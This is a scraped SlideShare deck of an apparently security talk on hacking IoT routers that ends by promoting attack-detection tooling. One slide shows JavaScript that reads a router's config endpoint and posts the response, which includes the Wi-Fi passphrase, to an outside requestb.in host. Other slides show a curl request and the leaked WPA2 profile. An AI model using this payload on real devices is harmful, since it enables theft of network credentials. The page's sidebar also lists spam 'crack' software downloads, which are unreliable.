SlideShare a Scribd company logo
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
7,432,663,275World Population
7,094,922,061Gemalto Breach
Index
$('#maintable')
.find('tr')
.find('td:eq(2)')
.toArray()
.map(e => e.innerText)
.map(e => e.replace(/[D]/g, ''))
.map(e => parseInt(e))
.reduce((a,b) => isNaN(b) ? a : a + b)
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
curl http://192.168.1.64/ajax/get_config?type=10 
-H 'Accept: text/plain, */*; q=0.01' 
-H 'X-Requested-With: XMLHttpRequest' 
-H 'Connection: keep-alive'
curl http://192.168.1.64/ajax/get_config?type=10 
-H 'Accept: text/plain, */*; q=0.01' 
-H 'X-Requested-With: XMLHttpRequest' 
-H 'Connection: keep-alive'
<wirelessProfile SSID="TELE2-E5340F">
<wirelessSecurity enabled="true">
<Mode passPhrase="9118C27AXX">
WPA2-AES
</Mode>
</wirelessSecurity>
</wirelessProfile>
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
var apGet = new XMLHttpRequest()
apGet.onreadystatechange = function() {
exfil = new XMLHttpRequest()
exfil.open("post", "http://requestb.in/1f05afw1", true)
exfil.send(apGet.responseText)
console.log(apGet.responseText)
}
apGet.open("get", "/ajax/get_config?type=10", true)
apGet.send()
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
A7 - Insufficient Attack Protection
The majority of applications and
APIs lack the basic ability to detect,
prevent, and respond to both
manual and automated attacks.
Attack protection goes far beyond
basic input validation and involves
automatically detecting, logging,
responding, and even blocking
exploit attempts. Application owners
also need to be able to deploy
patches quickly to protect against
attacks.
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Security Analysis
Log Analysis
Security Visualisation
Realtime Response
Hacking the Internet of Things for Fun & Profit
Hacking the Internet of Things for Fun & Profit
Load Balancer
sandbox 1.0 application 1.1
sandbox 1.0 application 1.1
Load Balancer
Hacking the Internet of Things for Fun & Profit
Web Application Security and insight
Please, hack or rate in the app!
@EnableBitSensor
Ruben van Vreeland
ruben@bitsensor.io

More Related Content

What's hot (18)

KEY
R meets Hadoop
Hidekazu Tanaka
 
PPTX
MongoDB Analytics: Learn Aggregation by Example - Exploratory Analytics and V...
MongoDB
 
KEY
RHadoop の紹介
Hidekazu Tanaka
 
DOCX
Advanced Data Visualization in R- Somes Examples.
Dr. Volkan OBAN
 
PDF
Clojure functions 4
Jackson dos Santos Olveira
 
DOCX
Basic Calculus in R.
Dr. Volkan OBAN
 
TXT
Threading
b290572
 
PPT
Ct es past_present_future_nycpgday_20130322
David Fetter
 
DOCX
Include
Shi Chakep
 
DOCX
imager package in R and examples..
Dr. Volkan OBAN
 
PPTX
FunctionalJS - George Shevtsov
Georgiy Shevtsov
 
DOCX
ggtimeseries-->ggplot2 extensions
Dr. Volkan OBAN
 
PDF
20151224-games
Noritada Shimizu
 
PPTX
Guava - Elements of Functional Programming
Anna Shymchenko
 
ODP
Daniel Sikar: Hadoop MapReduce - 06/09/2010
Skills Matter
 
PDF
Spark DataFrames for Data Munging
(Susan) Xinh Huynh
 
PDF
bioinfolec7th20071005
guest0fd313
 
DOCX
Pratik Bakane C++
pratikbakane
 
R meets Hadoop
Hidekazu Tanaka
 
MongoDB Analytics: Learn Aggregation by Example - Exploratory Analytics and V...
MongoDB
 
RHadoop の紹介
Hidekazu Tanaka
 
Advanced Data Visualization in R- Somes Examples.
Dr. Volkan OBAN
 
Clojure functions 4
Jackson dos Santos Olveira
 
Basic Calculus in R.
Dr. Volkan OBAN
 
Threading
b290572
 
Ct es past_present_future_nycpgday_20130322
David Fetter
 
Include
Shi Chakep
 
imager package in R and examples..
Dr. Volkan OBAN
 
FunctionalJS - George Shevtsov
Georgiy Shevtsov
 
ggtimeseries-->ggplot2 extensions
Dr. Volkan OBAN
 
20151224-games
Noritada Shimizu
 
Guava - Elements of Functional Programming
Anna Shymchenko
 
Daniel Sikar: Hadoop MapReduce - 06/09/2010
Skills Matter
 
Spark DataFrames for Data Munging
(Susan) Xinh Huynh
 
bioinfolec7th20071005
guest0fd313
 
Pratik Bakane C++
pratikbakane
 

Recently uploaded (20)

PPTX
Web Testing.pptx528278vshbuqffqhhqiwnwuq
studylike474
 
PPTX
Employee salary prediction using Machine learning Project template.ppt
bhanuk27082004
 
PPTX
Presentation about Database and Database Administrator
abhishekchauhan86963
 
PDF
Adobe Illustrator Crack Full Download (Latest Version 2025) Pre-Activated
imang66g
 
PPTX
TRAVEL APIs | WHITE LABEL TRAVEL API | TOP TRAVEL APIs
philipnathen82
 
PDF
AI Image Enhancer: Revolutionizing Visual Quality”
docmasoom
 
PDF
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
PDF
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
PDF
What companies do with Pharo (ESUG 2025)
ESUG
 
PDF
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
PPT
Activate_Methodology_Summary presentatio
annapureddyn
 
PPTX
classification of computer and basic part of digital computer
ravisinghrajpurohit3
 
PDF
Protecting the Digital World Cyber Securit
dnthakkar16
 
PPTX
Contractor Management Platform and Software Solution for Compliance
SHEQ Network Limited
 
PDF
New Download FL Studio Crack Full Version [Latest 2025]
imang66g
 
PDF
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
PDF
Enhancing Security in VAST: Towards Static Vulnerability Scanning
ESUG
 
PDF
On Software Engineers' Productivity - Beyond Misleading Metrics
Romén Rodríguez-Gil
 
PPT
Why Reliable Server Maintenance Service in New York is Crucial for Your Business
Sam Vohra
 
PDF
Generating Union types w/ Static Analysis
K. Matthew Dupree
 
Web Testing.pptx528278vshbuqffqhhqiwnwuq
studylike474
 
Employee salary prediction using Machine learning Project template.ppt
bhanuk27082004
 
Presentation about Database and Database Administrator
abhishekchauhan86963
 
Adobe Illustrator Crack Full Download (Latest Version 2025) Pre-Activated
imang66g
 
TRAVEL APIs | WHITE LABEL TRAVEL API | TOP TRAVEL APIs
philipnathen82
 
AI Image Enhancer: Revolutionizing Visual Quality”
docmasoom
 
Virtual Threads in Java: A New Dimension of Scalability and Performance
Tier1 app
 
Applitools Platform Pulse: What's New and What's Coming - July 2025
Applitools
 
What companies do with Pharo (ESUG 2025)
ESUG
 
MiniTool Power Data Recovery Crack New Pre Activated Version Latest 2025
imang66g
 
Activate_Methodology_Summary presentatio
annapureddyn
 
classification of computer and basic part of digital computer
ravisinghrajpurohit3
 
Protecting the Digital World Cyber Securit
dnthakkar16
 
Contractor Management Platform and Software Solution for Compliance
SHEQ Network Limited
 
New Download FL Studio Crack Full Version [Latest 2025]
imang66g
 
advancepresentationskillshdhdhhdhdhdhhfhf
jasmenrojas249
 
Enhancing Security in VAST: Towards Static Vulnerability Scanning
ESUG
 
On Software Engineers' Productivity - Beyond Misleading Metrics
Romén Rodríguez-Gil
 
Why Reliable Server Maintenance Service in New York is Crucial for Your Business
Sam Vohra
 
Generating Union types w/ Static Analysis
K. Matthew Dupree
 

Hacking the Internet of Things for Fun & Profit